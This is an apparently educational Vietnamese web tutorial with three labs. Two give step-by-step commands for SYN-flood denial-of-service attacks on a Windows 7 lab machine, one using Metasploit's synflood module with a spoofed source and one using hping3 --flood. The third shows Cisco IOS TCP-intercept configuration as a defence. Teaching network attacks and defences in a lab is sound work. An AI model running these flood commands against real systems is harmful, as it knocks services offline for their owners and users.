Lab 10-1: Tấn công tràn SYN bằng Metasploit

Sử dụng Kali Linux để tấn công tràn SYN trên máy Windows 7 (10.10.50.202) bằng Metasploit Framework. Chúng ta cũng dùng bộ lọc Wireshark để kiểm tra gói tin trên máy nạn nhân.

Quy trình

  1. Mở Kali Linux Terminal
  2. Nhập lệnh dưới để quét port 21
nmap –p 21 10.10.50.202

Port 21 mở, đã được lọc

  1. Nhập lệnh msfconsole để khởi chạy Metasploit framework
  1. Nhập lệnh use auxiliary/dos/tcp/synflood
  2. Sau đó nhập show options

Kết quả cho thấy thiết lập mặc định và thông số bắt buộc.

  1. Nhập các lệnh sau:
set RHOST 10.10.50.202

set RPORT 21

set SHOST 10.0.0.1

set TIMEOUT 30000
  1. Nhập lệnh exploit để bắt đầu tấn công tràn SYN
  2. Đăng nhập vào máy Windows 7 (nạn nhân)
  3. Mở Task Manager và quan sát biểu đồ hoạt động
  1. Mở Wireshark và chuyển bộ lọc thành TCP cho những gói tin cần lọc

Lab 10-2: Tấn công tràn SYN bằng Hping3

Ở đây, chúng ta sẽ sử dụng Kali Linux để tấn công tràn SYN trên máy Windows 7 (10.10.50.202) bằng lệnh Hping3. Chúng ta cũng dùng bộ lọc Wireshark để kiểm tra gói tin trên máy nạn nhân.

Quy trình

  1. Mở Kali Linux Terminal
  2. Nhập lệnh
hping3 10.10.50.202 –flood
  1. Mở máy Windows 7 và thu thập gói tin
  2. Ứng dụng Wireshark có thể không phản hồi

Lab 10-3: Thiết lập lệnh chặn bắt TCP trên bộ định tuyến Cisco IOS

Router(config)# access-list <access-list-number> {deny | permit} TCP any <destination> <destination-wildcard>

access-list 101 permit TCP any 192.168.1.0 0.0.0.255
ip tcp intercept list access-list-number
ip tcp intercept list 101
ip tcp intercept mode {intercept | watch}

Leave a Reply

This site uses cookies to offer you a better browsing experience. By browsing this website, you agree to our use of cookies.
x  Powerful Protection for WordPress, from Shield Security
This Site Is Protected By
Shield Security